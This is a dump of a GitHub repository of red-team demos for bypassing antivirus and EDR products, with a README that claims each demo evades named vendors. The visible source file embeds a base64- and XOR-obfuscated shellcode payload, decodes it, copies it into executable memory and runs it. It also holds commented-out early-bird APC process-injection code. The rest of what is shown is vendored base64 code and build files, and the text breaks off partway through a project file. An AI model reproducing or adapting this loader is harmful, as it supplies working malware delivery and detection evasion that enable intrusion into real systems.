Showing preview only (521K chars total). Download the full file or copy to clipboard to get everything.
Repository: 7BitsTeam/EDR-Bypass-demo
Branch: main
Commit: 11ea33e1a5b2
Files: 280
Total size: 471.0 KB
Directory structure:
gitextract_5ot6inlx/
├── README.md
├── chapter4-demo1/
│ ├── demo1/
│ │ ├── Debug/
│ │ │ ├── demo1.log
│ │ │ ├── demo1.obj
│ │ │ ├── demo1.obj.enc
│ │ │ ├── demo1.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── demo1.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── vc142.idb
│ │ │ └── vc142.pdb
│ │ ├── Header.h
│ │ ├── base64.cpp
│ │ ├── base64.h
│ │ ├── demo1.cpp
│ │ ├── demo1.vcxproj
│ │ ├── demo1.vcxproj.filters
│ │ ├── demo1.vcxproj.user
│ │ └── x64/
│ │ ├── Debug/
│ │ │ ├── base64.obj
│ │ │ ├── demo1.exe.recipe
│ │ │ ├── demo1.ilk
│ │ │ ├── demo1.log
│ │ │ ├── demo1.obj
│ │ │ ├── demo1.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── demo1.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── vc142.idb
│ │ │ ├── vc142.pdb
│ │ │ ├── vc143.idb
│ │ │ └── vc143.pdb
│ │ └── Release/
│ │ ├── base64.obj
│ │ ├── demo1.exe.recipe
│ │ ├── demo1.iobj
│ │ ├── demo1.ipdb
│ │ ├── demo1.log
│ │ ├── demo1.obj
│ │ ├── demo1.tlog/
│ │ │ ├── CL.command.1.tlog
│ │ │ ├── CL.read.1.tlog
│ │ │ ├── CL.write.1.tlog
│ │ │ ├── demo1.lastbuildstate
│ │ │ ├── link.command.1.tlog
│ │ │ ├── link.read.1.tlog
│ │ │ └── link.write.1.tlog
│ │ └── vc143.pdb
│ ├── demo1.sln
│ └── enc.py
├── chapter4-demo2/
│ ├── demo1/
│ │ ├── Debug/
│ │ │ ├── demo1.log
│ │ │ ├── demo1.obj
│ │ │ ├── demo1.obj.enc
│ │ │ ├── demo1.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── demo1.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── vc142.idb
│ │ │ └── vc142.pdb
│ │ ├── Header.h
│ │ ├── base64.cpp
│ │ ├── base64.h
│ │ ├── demo1 - 快捷方式.lnk
│ │ ├── demo1.cpp
│ │ ├── demo1.vcxproj
│ │ ├── demo1.vcxproj.filters
│ │ ├── demo1.vcxproj.user
│ │ ├── nt.asm
│ │ ├── nt.h
│ │ └── x64/
│ │ ├── Debug/
│ │ │ ├── base64.obj
│ │ │ ├── demo1.exe.recipe
│ │ │ ├── demo1.ilk
│ │ │ ├── demo1.log
│ │ │ ├── demo1.obj
│ │ │ ├── demo1.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── demo1.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── vc142.idb
│ │ │ ├── vc142.pdb
│ │ │ ├── vc143.idb
│ │ │ └── vc143.pdb
│ │ └── Release/
│ │ ├── base64.obj
│ │ ├── demo1.exe.recipe
│ │ ├── demo1.iobj
│ │ ├── demo1.ipdb
│ │ ├── demo1.log
│ │ ├── demo1.obj
│ │ ├── demo1.tlog/
│ │ │ ├── CL.command.1.tlog
│ │ │ ├── CL.read.1.tlog
│ │ │ ├── CL.write.1.tlog
│ │ │ ├── Masm.read.1u.tlog
│ │ │ ├── Masm.write.1u.tlog
│ │ │ ├── demo1.lastbuildstate
│ │ │ ├── link.command.1.tlog
│ │ │ ├── link.read.1.tlog
│ │ │ └── link.write.1.tlog
│ │ ├── nt.obj
│ │ └── vc143.pdb
│ ├── demo1.sln
│ └── enc.py
├── chapter4-demo3/
│ ├── demo1/
│ │ ├── Debug/
│ │ │ ├── demo1.log
│ │ │ ├── demo1.obj
│ │ │ ├── demo1.obj.enc
│ │ │ ├── demo1.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── demo1.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── vc142.idb
│ │ │ └── vc142.pdb
│ │ ├── Header.h
│ │ ├── base64.cpp
│ │ ├── base64.h
│ │ ├── demo1 - 快捷方式.lnk
│ │ ├── demo1.cpp
│ │ ├── demo1.vcxproj
│ │ ├── demo1.vcxproj.filters
│ │ ├── demo1.vcxproj.user
│ │ ├── nt.asm
│ │ ├── nt.h
│ │ └── x64/
│ │ ├── Debug/
│ │ │ ├── base64.obj
│ │ │ ├── demo1.exe.recipe
│ │ │ ├── demo1.ilk
│ │ │ ├── demo1.log
│ │ │ ├── demo1.obj
│ │ │ ├── demo1.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── demo1.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── vc142.idb
│ │ │ ├── vc142.pdb
│ │ │ ├── vc143.idb
│ │ │ └── vc143.pdb
│ │ └── Release/
│ │ ├── base64.obj
│ │ ├── demo1.exe.recipe
│ │ ├── demo1.iobj
│ │ ├── demo1.ipdb
│ │ ├── demo1.log
│ │ ├── demo1.tlog/
│ │ │ ├── CL.command.1.tlog
│ │ │ ├── CL.read.1.tlog
│ │ │ ├── CL.write.1.tlog
│ │ │ ├── Masm.read.1u.tlog
│ │ │ ├── Masm.write.1u.tlog
│ │ │ ├── demo1.lastbuildstate
│ │ │ ├── link.command.1.tlog
│ │ │ ├── link.read.1.tlog
│ │ │ ├── link.write.1.tlog
│ │ │ └── unsuccessfulbuild
│ │ ├── nt.obj
│ │ └── vc143.pdb
│ └── demo1.sln
├── chapter4-demo4/
│ ├── CODE_OF_CONDUCT.md
│ ├── LICENSE.txt
│ ├── README.md
│ ├── ShellcodeFluctuation/
│ │ ├── ShellcodeFluctuation.vcxproj
│ │ ├── ShellcodeFluctuation.vcxproj.filters
│ │ ├── ShellcodeFluctuation.vcxproj.user
│ │ ├── base64.cpp
│ │ ├── base64.h
│ │ ├── header.h
│ │ ├── main.cpp
│ │ └── x64/
│ │ ├── Debug/
│ │ │ ├── Shellcod.9eed9e19.tlog/
│ │ │ │ ├── CL.command.1.tlog
│ │ │ │ ├── CL.read.1.tlog
│ │ │ │ ├── CL.write.1.tlog
│ │ │ │ ├── ShellcodeFluctuation.lastbuildstate
│ │ │ │ ├── link.command.1.tlog
│ │ │ │ ├── link.read.1.tlog
│ │ │ │ └── link.write.1.tlog
│ │ │ ├── ShellcodeFluctuation.exe.recipe
│ │ │ ├── ShellcodeFluctuation.ilk
│ │ │ ├── ShellcodeFluctuation.log
│ │ │ ├── base64.obj
│ │ │ ├── main.obj
│ │ │ ├── vc143.idb
│ │ │ └── vc143.pdb
│ │ └── Release/
│ │ ├── Shellcod.9eed9e19.tlog/
│ │ │ ├── CL.command.1.tlog
│ │ │ ├── CL.read.1.tlog
│ │ │ ├── CL.write.1.tlog
│ │ │ ├── ShellcodeFluctuation.lastbuildstate
│ │ │ ├── link.command.1.tlog
│ │ │ ├── link.read.1.tlog
│ │ │ └── link.write.1.tlog
│ │ ├── ShellcodeFluctuation.exe.recipe
│ │ ├── ShellcodeFluctuation.iobj
│ │ ├── ShellcodeFluctuation.ipdb
│ │ ├── ShellcodeFluctuation.log
│ │ ├── base64.obj
│ │ ├── main.obj
│ │ └── vc143.pdb
│ ├── ShellcodeFluctuation.sln
│ └── x64/
│ ├── Debug/
│ │ └── ShellcodeFluctuation.pdb
│ └── Release/
│ └── ShellcodeFluctuation.pdb
├── demo1/
│ ├── README.md
│ └── shellcode_execute/
│ └── shellcode_execute/
│ ├── shellcode_execute/
│ │ ├── resource.h
│ │ ├── shellcode_execute.aps
│ │ ├── shellcode_execute.cpp
│ │ ├── shellcode_execute.rc
│ │ ├── shellcode_execute.vcxproj
│ │ ├── shellcode_execute.vcxproj.filters
│ │ └── shellcode_execute.vcxproj.user
│ └── shellcode_execute.sln
├── demo2/
│ ├── README.md
│ └── shellcode_execut3/
│ ├── shellcode_execut3/
│ │ ├── App.config
│ │ ├── Program.cs
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ └── shellcode_execut3.csproj
│ └── shellcode_execut3.sln
├── demo3/
│ ├── README.md
│ └── SharpInjector-master/
│ ├── .gitignore
│ ├── README.md
│ ├── ScEncryptor/
│ │ ├── App.config
│ │ ├── Program.cs
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ └── ScEncryptor.csproj
│ ├── SharpInjector/
│ │ ├── App.config
│ │ ├── CreateFiber.cs
│ │ ├── CreateRemoteThread.cs
│ │ ├── CreateRemoteThreadEx.cs
│ │ ├── CreateThread.cs
│ │ ├── EtwpCreateEtwThread.cs
│ │ ├── Program.cs
│ │ ├── Properties/
│ │ │ ├── AssemblyInfo.cs
│ │ │ ├── Resource1.Designer.cs
│ │ │ └── Resource1.resx
│ │ ├── QueueUserAPC.cs
│ │ ├── RtlCreateUserThread.cs
│ │ ├── SharpInjector.csproj
│ │ ├── Shellycode.cs
│ │ └── WinAPI.cs
│ └── SharpInjector.sln
├── demo4/
│ └── syscall/
│ ├── syscall/
│ │ ├── Syscall.asm
│ │ ├── syscall.vcxproj
│ │ ├── syscall.vcxproj.filters
│ │ ├── syscall.vcxproj.user
│ │ ├── syscall_call.cpp
│ │ └── x64/
│ │ └── Debug/
│ │ ├── Syscall.obj
│ │ ├── syscall.exe.recipe
│ │ ├── syscall.ilk
│ │ ├── syscall.log
│ │ ├── syscall.tlog/
│ │ │ ├── CL.command.1.tlog
│ │ │ ├── CL.read.1.tlog
│ │ │ ├── CL.write.1.tlog
│ │ │ ├── Masm.read.1u.tlog
│ │ │ ├── Masm.write.1u.tlog
│ │ │ ├── link.command.1.tlog
│ │ │ ├── link.read.1.tlog
│ │ │ ├── link.write.1.tlog
│ │ │ └── syscall.lastbuildstate
│ │ ├── syscall_call.obj
│ │ ├── vc143.idb
│ │ └── vc143.pdb
│ └── syscall.sln
├── demo5/
│ └── syscall3/
│ ├── syscall3/
│ │ ├── 1-asm.x64.asm
│ │ ├── 1.cpp
│ │ ├── 1.h
│ │ ├── syscall3.cpp
│ │ ├── syscall3.vcxproj
│ │ ├── syscall3.vcxproj.filters
│ │ └── syscall3.vcxproj.user
│ └── syscall3.sln
└── demo6/
├── unhook_demo/
│ ├── Header.h
│ ├── unhook_demo.cpp
│ ├── unhook_demo.vcxproj
│ ├── unhook_demo.vcxproj.filters
│ └── unhook_demo.vcxproj.user
└── unhook_demo.sln
================================================
FILE CONTENTS
================================================
================================================
FILE: README.md
================================================
# EDR-Bypass-demo
Some demos to bypass EDRs or AVs by 78itsT3@m
## 本文为7bits系列文章《红队队开发基础-基础免杀》的示例代码
### 欢迎关注我们的公众号 - Zbits2022
### demo 1-3 为《红队队开发基础-基础免杀(一)》的内容
- demo1:
c++代码,使用disableETW,shellcode加密,隐藏导入表的免杀方式对shellcode进行免杀
- demo2:
c#代码,使用字符串加密、异或加密、沙箱绕过方式进行bypass AV。
- demo3:
c#代码,优化demo2的shellcode加载方式,修改SharpInjector,使用EtwpCreateEtwThread加载shellcode。
### demo 4-5 为《红队队开发基础-基础免杀(二)》的内容
- demo4:
c++代码,最简单的syscall例子
- demo5:
c++代码,使用SysWhispers3的jump方法,绕过对syscall的静态检查
### demo 6 为《红队开发基础-基础免杀(三)》的内容
- demo6:
c++代码,修改RefleXXion使其对user32.dll进行unhook。
### chapter4 demo1-4为《红队开发基础-基础免杀(四)》的内容
下面的例子均是忽略流量特征的情况:
- demo1:base64+xor混淆shellcode,过360,火绒。
- demo2:加强了静态混淆,过definder,麦咖啡。
- demo3:加入syscall及apc调用方式,过卡巴斯基edr
- demo4:加入beacon的内存加密,过eset edr
================================================
FILE: chapter4-demo1/demo1/Debug/demo1.log
================================================
demo1.vcxproj -> E:\7bits_demo\demo1\demo1\Debug\demo1.exe
================================================
FILE: chapter4-demo1/demo1/Debug/demo1.tlog/demo1.lastbuildstate
================================================
#TargetFrameworkVersion=v4.0:PlatformToolSet=v142:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0
Debug|Win32|E:\7bits_demo\demo1\demo1\|
================================================
FILE: chapter4-demo1/demo1/Header.h
================================================
#pragma once
const int XOR_KEY{ 8 };
================================================
FILE: chapter4-demo1/demo1/base64.cpp
================================================
/*
base64.cpp and base64.h
base64 encoding and decoding with C++.
More information at
https://renenyffenegger.ch/notes/development/Base64/Encoding-and-decoding-base-64-with-cpp
Version: 2.rc.08 (release candidate)
Copyright (C) 2004-2017, 2020, 2021 Ren?Nyffenegger
This source code is provided 'as-is', without any express or implied
warranty. In no event will the author be held liable for any damages
arising from the use of this software.
Permission is granted to anyone to use this software for any purpose,
including commercial applications, and to alter it and redistribute it
freely, subject to the following restrictions:
1. The origin of this source code must not be misrepresented; you must not
claim that you wrote the original source code. If you use this source code
in a product, an acknowledgment in the product documentation would be
appreciated but is not required.
2. Altered source versions must be plainly marked as such, and must not be
misrepresented as being the original source code.
3. This notice may not be removed or altered from any source distribution.
Ren?Nyffenegger rene.nyffenegger@adp-gmbh.ch
*/
#include "base64.h"
#include <algorithm>
#include <stdexcept>
//
// Depending on the url parameter in base64_chars, one of
// two sets of base64 characters needs to be chosen.
// They differ in their last two characters.
//
static const char* base64_chars[2] = {
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz"
"0123456789"
"+/",
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz"
"0123456789"
"-_" };
static unsigned int pos_of_char(const unsigned char chr) {
//
// Return the position of chr within base64_encode()
//
if (chr >= 'A' && chr <= 'Z') return chr - 'A';
else if (chr >= 'a' && chr <= 'z') return chr - 'a' + ('Z' - 'A') + 1;
else if (chr >= '0' && chr <= '9') return chr - '0' + ('Z' - 'A') + ('z' - 'a') + 2;
else if (chr == '+' || chr == '-') return 62; // Be liberal with input and accept both url ('-') and non-url ('+') base 64 characters (
else if (chr == '/' || chr == '_') return 63; // Ditto for '/' and '_'
else
//
// 2020-10-23: Throw std::exception rather than const char*
//(Pablo Martin-Gomez, https://github.com/Bouska)
//
throw std::runtime_error("Input is not valid base64-encoded data.");
}
static std::string insert_linebreaks(std::string str, size_t distance) {
//
// Provided by https://github.com/JomaCorpFX, adapted by me.
//
if (!str.length()) {
return "";
}
size_t pos = distance;
while (pos < str.size()) {
str.insert(pos, "\n");
pos += distance + 1;
}
return str;
}
template <typename String, unsigned int line_length>
static std::string encode_with_line_breaks(String s) {
return insert_linebreaks(base64_encode(s, false), line_length);
}
template <typename String>
static std::string encode_pem(String s) {
return encode_with_line_breaks<String, 64>(s);
}
template <typename String>
static std::string encode_mime(String s) {
return encode_with_line_breaks<String, 76>(s);
}
template <typename String>
static std::string encode(String s, bool url) {
return base64_encode(reinterpret_cast<const unsigned char*>(s.data()), s.length(), url);
}
std::string base64_encode(unsigned char const* bytes_to_encode, size_t in_len, bool url) {
size_t len_encoded = (in_len + 2) / 3 * 4;
unsigned char trailing_char = url ? '.' : '=';
//
// Choose set of base64 characters. They differ
// for the last two positions, depending on the url
// parameter.
// A bool (as is the parameter url) is guaranteed
// to evaluate to either 0 or 1 in C++ therefore,
// the correct character set is chosen by subscripting
// base64_chars with url.
//
const char* base64_chars_ = base64_chars[url];
std::string ret;
ret.reserve(len_encoded);
unsigned int pos = 0;
while (pos < in_len) {
ret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0xfc) >> 2]);
if (pos + 1 < in_len) {
ret.push_back(base64_chars_[((bytes_to_encode[pos + 0] & 0x03) << 4) + ((bytes_to_encode[pos + 1] & 0xf0) >> 4)]);
if (pos + 2 < in_len) {
ret.push_back(base64_chars_[((bytes_to_encode[pos + 1] & 0x0f) << 2) + ((bytes_to_encode[pos + 2] & 0xc0) >> 6)]);
ret.push_back(base64_chars_[bytes_to_encode[pos + 2] & 0x3f]);
}
else {
ret.push_back(base64_chars_[(bytes_to_encode[pos + 1] & 0x0f) << 2]);
ret.push_back(trailing_char);
}
}
else {
ret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0x03) << 4]);
ret.push_back(trailing_char);
ret.push_back(trailing_char);
}
pos += 3;
}
return ret;
}
template <typename String>
static std::string decode(String encoded_string, bool remove_linebreaks) {
//
// decode(? is templated so that it can be used with String = const std::string&
// or std::string_view (requires at least C++17)
//
if (encoded_string.empty()) return std::string();
if (remove_linebreaks) {
std::string copy(encoded_string);
copy.erase(std::remove(copy.begin(), copy.end(), '\n'), copy.end());
return base64_decode(copy, false);
}
size_t length_of_string = encoded_string.length();
size_t pos = 0;
//
// The approximate length (bytes) of the decoded string might be one or
// two bytes smaller, depending on the amount of trailing equal signs
// in the encoded string. This approximation is needed to reserve
// enough space in the string to be returned.
//
size_t approx_length_of_decoded_string = length_of_string / 4 * 3;
std::string ret;
ret.reserve(approx_length_of_decoded_string);
while (pos < length_of_string) {
//
// Iterate over encoded input string in chunks. The size of all
// chunks except the last one is 4 bytes.
//
// The last chunk might be padded with equal signs or dots
// in order to make it 4 bytes in size as well, but this
// is not required as per RFC 2045.
//
// All chunks except the last one produce three output bytes.
//
// The last chunk produces at least one and up to three bytes.
//
size_t pos_of_char_1 = pos_of_char(encoded_string[pos + 1]);
//
// Emit the first output byte that is produced in each chunk:
//
ret.push_back(static_cast<std::string::value_type>(((pos_of_char(encoded_string[pos + 0])) << 2) + ((pos_of_char_1 & 0x30) >> 4)));
if ((pos + 2 < length_of_string) && // Check for data that is not padded with equal signs (which is allowed by RFC 2045)
encoded_string[pos + 2] != '=' &&
encoded_string[pos + 2] != '.' // accept URL-safe base 64 strings, too, so check for '.' also.
)
{
//
// Emit a chunk's second byte (which might not be produced in the last chunk).
//
unsigned int pos_of_char_2 = pos_of_char(encoded_string[pos + 2]);
ret.push_back(static_cast<std::string::value_type>(((pos_of_char_1 & 0x0f) << 4) + ((pos_of_char_2 & 0x3c) >> 2)));
if ((pos + 3 < length_of_string) &&
encoded_string[pos + 3] != '=' &&
encoded_string[pos + 3] != '.'
)
{
//
// Emit a chunk's third byte (which might not be produced in the last chunk).
//
ret.push_back(static_cast<std::string::value_type>(((pos_of_char_2 & 0x03) << 6) + pos_of_char(encoded_string[pos + 3])));
}
}
pos += 4;
}
return ret;
}
std::string base64_decode(std::string const& s, bool remove_linebreaks) {
return decode(s, remove_linebreaks);
}
std::string base64_encode(std::string const& s, bool url) {
return encode(s, url);
}
std::string base64_encode_pem(std::string const& s) {
return encode_pem(s);
}
std::string base64_encode_mime(std::string const& s) {
return encode_mime(s);
}
#if __cplusplus >= 201703L
//
// Interface with std::string_view rather than const std::string&
// Requires C++17
// Provided by Yannic Bonenberger (https://github.com/Yannic)
//
std::string base64_encode(std::string_view s, bool url) {
return encode(s, url);
}
std::string base64_encode_pem(std::string_view s) {
return encode_pem(s);
}
std::string base64_encode_mime(std::string_view s) {
return encode_mime(s);
}
std::string base64_decode(std::string_view s, bool remove_linebreaks) {
return decode(s, remove_linebreaks);
}
#endif // __cplusplus >= 201703L
================================================
FILE: chapter4-demo1/demo1/base64.h
================================================
//
// base64 encoding and decoding with C++.
// Version: 2.rc.08 (release candidate)
//
#ifndef BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A
#define BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A
#include <string>
#if __cplusplus >= 201703L
#include <string_view>
#endif // __cplusplus >= 201703L
std::string base64_encode(std::string const& s, bool url = false);
std::string base64_encode_pem(std::string const& s);
std::string base64_encode_mime(std::string const& s);
std::string base64_decode(std::string const& s, bool remove_linebreaks = false);
std::string base64_encode(unsigned char const*, size_t len, bool url = false);
#if __cplusplus >= 201703L
//
// Interface with std::string_view rather than const std::string&
// Requires C++17
// Provided by Yannic Bonenberger (https://github.com/Yannic)
//
std::string base64_encode(std::string_view s, bool url = false);
std::string base64_encode_pem(std::string_view s);
std::string base64_encode_mime(std::string_view s);
std::string base64_decode(std::string_view s, bool remove_linebreaks = false);
#endif // __cplusplus >= 201703L
#endif /* BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A */
================================================
FILE: chapter4-demo1/demo1/demo1.cpp
================================================
// demo1.cpp : This file contains the 'main' function. Program execution begins and ends there.
//
#include <iostream>
#include <windows.h>
#include "header.h"
#include "base64.h"
using namespace std;
unsigned char* ReadProcessBlob(const char* fnamSc, DWORD* szSc)
{
DWORD szRead{ 0 };
HANDLE hFile = CreateFileA(
fnamSc,
GENERIC_READ,
NULL,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (INVALID_HANDLE_VALUE == hFile)
return nullptr;
SIZE_T szFile = GetFileSize(hFile, NULL);
*szSc = szFile;
unsigned char* raw = new unsigned char[szFile];
unsigned char* sc = new unsigned char[szFile];
if (!ReadFile(hFile, raw, szFile, &szRead, NULL))
return nullptr;
int i;
for (i = 0; i < szRead; i++) {
sc[i] = raw[i] ^ XOR_KEY;
}
return sc;
}
int main()
{
bool all_tests_passed = false;
std::string rest2_reference = "9ECL7PjgwAgICElZSVhaWV5AOdptQINaaECDWhBAg1ooQIN6WEAHv0JCRTnBQDnIpDRpdAokKEnJwQVJCcnq5VpJWUCDWiiDSjRACdhuiXAQAwp9eoOIgAgICECNyHxvQAnYWINAEEyDSChBCdjrXkD3wUmDPIBACd5FOcFAOcikScnBBUkJyTDofflEC0QsAE0x2X3QUEyDSCxBCdhuSYMEQEyDSBRBCdhJgwyAQAnYSVBJUFZRUklQSVFJUkCL5ChJWvfoUElRUkCDGuFH9/f3VWIIQbZ/YWZhZm18CEleQYHuRIH5SbJEfy4P991AOcFAOdpFOchFOcFJWElYSbIyXnGv993je1JAgclJsFgICAhFOcFJWUlZYgtJWUmyX4GXzvfd41FTQIHJQDnaQYHQRTnBWmAICkiMWlpJsuNdJjP33UCBzkCLy1hiAldAgflAgdJBz8j39/f3RTnBWlpJsiUOEHP33Y3IB42VCQgIQPfHB4yECQgI49vh7AkICOCq9/f3J0V8UEwIQShDvCCeEfnGqz4QOUCZb1k9zZRfrP2kaoTlwQZQ+aY4tgZwQlaNp0lYfmGOcGoGYzblJRLD9V4TH2y6c1s4iOAMlePMttdpgghde216JUlvbWZ8MihFZ3JhZGRpJzwmOCgga2dleGl8YWpkbTMoRVtBTSg/JjgzKF9hZmxnf3soRlwoPSY5IQUCCM1l6QoDmhAeJZoutN1CPkoMbBYRT4p4JodhVtQQ/QXiL7U61RfcwKRjFq95GITSknVDXEYydGh4NjiMRT6a43pevMz6zCoiQMDcYy/1jHjhWWvhVp/6TPSIiL5RP8LaSwpz++6FswyGtYnKUJ+da0rRw4YW4GE1isJ9yBukKGBzCetRpZrAZtf8AZPUpuLRg9gLYdXFeifw5yhKxN4jy6BQV14m/VHXb2WO3XrQXc7c0CxfgIM1rYMHGVMH6y9uyurrF7uMzIg+sptJ4pFTYuzDslBKxx4+qcw2ikCPTsks2vAe8rGqLYAwlP4+eRcISbb4vape991AOcGyCAhICEmwCBgICEmxSAgICEmyUKxb7ffdQJtbW0CB70CB+UCB0kmwCCgICEGB8UmyGp6B6vfdQIvMKI3IfL5ugw9ACcuNyH3fUFBQQA0ICAgIWMvgl/X39zkxOiY5PjAmOCY5OzkIWQG3ZQ==";
std::string rest2_decoded = base64_decode(rest2_reference);
const char* S = rest2_decoded.c_str();
unsigned char* sc = new unsigned char[rest2_decoded.length()];
for (int i = 0; i < rest2_decoded.length(); i++) {
sc[i] = S[i] ^ XOR_KEY;
}
void * exec = VirtualAlloc(0, rest2_decoded.length(), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, sc, rest2_decoded.length());
//unsigned const char* S=
((void(*)())exec)();
/*
CreateThread
HANDLE hThread = CreateThread(
NULL,
0,
(LPTHREAD_START_ROUTINE)exec,
NULL,
0,
NULL);
if (hThread == NULL)
{
return 1;
}
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
*/
/*
eariler bird APC
SIZE_T shellSize = szSc;
STARTUPINFOA si = { 0 };
PROCESS_INFORMATION pi = { 0 };
CreateProcessA("C:\\Windows\\System32\\calc.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
HANDLE victimProcess = pi.hProcess;
HANDLE threadHandle = pi.hThread;
LPVOID shellAddress = VirtualAllocEx(victimProcess, NULL, shellSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellAddress;
WriteProcessMemory(victimProcess, shellAddress, S, shellSize, NULL);
QueueUserAPC((PAPCFUNC)apcRoutine, threadHandle, NULL);
ResumeThread(threadHandle);
*/
}
// Run program: Ctrl + F5 or Debug > Start Without Debugging menu
// Debug program: F5 or Debug > Start Debugging menu
// Tips for Getting Started:
// 1. Use the Solution Explorer window to add/manage files
// 2. Use the Team Explorer window to connect to source control
// 3. Use the Output window to see build output and other messages
// 4. Use the Error List window to view errors
// 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project
// 6. In the future, to open this project again, go to File > Open > Project and select the .sln file
================================================
FILE: chapter4-demo1/demo1/demo1.vcxproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<ProjectGuid>{1876F365-2DEC-42C9-B80E-B631B26FCAD8}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>demo1</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
